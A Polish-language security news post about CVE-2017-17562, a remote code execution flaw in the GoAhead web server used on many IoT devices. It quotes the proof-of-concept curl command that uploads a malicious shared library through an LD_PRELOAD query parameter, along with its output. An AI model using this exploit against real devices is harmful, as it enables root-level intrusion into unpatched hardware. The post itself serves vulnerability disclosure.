Zagłada IoT – jednen z najpopularniejszych serwerów HTTP w IoT podatny na zdalne, proste wykonanie kodu

Podatność  CVE-2017-17562 występuje w web serwerze GoAhead, wykorzystywanym przez przeszło 700 000 urządzeń dostępnych w Internecie (wg. cytowanego w oryginalnym wpisie Shodana; Zoomeye potrafi wskazać nawet ~2 000 000 urządzeń).

Podatne są wszystkie wersje serwera GoAhead < 3.6.5  – a umożliwiają one zdalne wykonanie kodu – na urządzeniach klasy IoT będzie to najczęściej root. Często nie będzie to wymagało żadnego uwierzytelnienia…

Dostępny jest też gotowy exploit,  z wariantami na ARM/MIPS/oraz architekturę Intela (32 oraz 64 bity), który technicznie sprowadza się do załadowania swojej biblioteki (ze złośliwym wykorzystaniem LD_PRELOAD) do binarki webserwera:

daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9931    0  2035  100  7896   2035   7896  0:00:01  0:00:01 --:--:--  9774
HTTP/1.1 200 OK
Date: Sun Dec 17 13:08:20 2017
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello:  World!
Content-type: text/html

Ostatnia głośna akcja związana ze zmienną LD_PRELOAD, o której pamiętam dotyczyła privilege escalation we FreeBSD (można było wtedy załadować dowolną, własną bibliotekę do dowolnej suidowanej binarki).

Warto zwrócić uwagę, że zapewne większość urządzeń używających serwera GoAhead nigdy nie doczeka się patcha.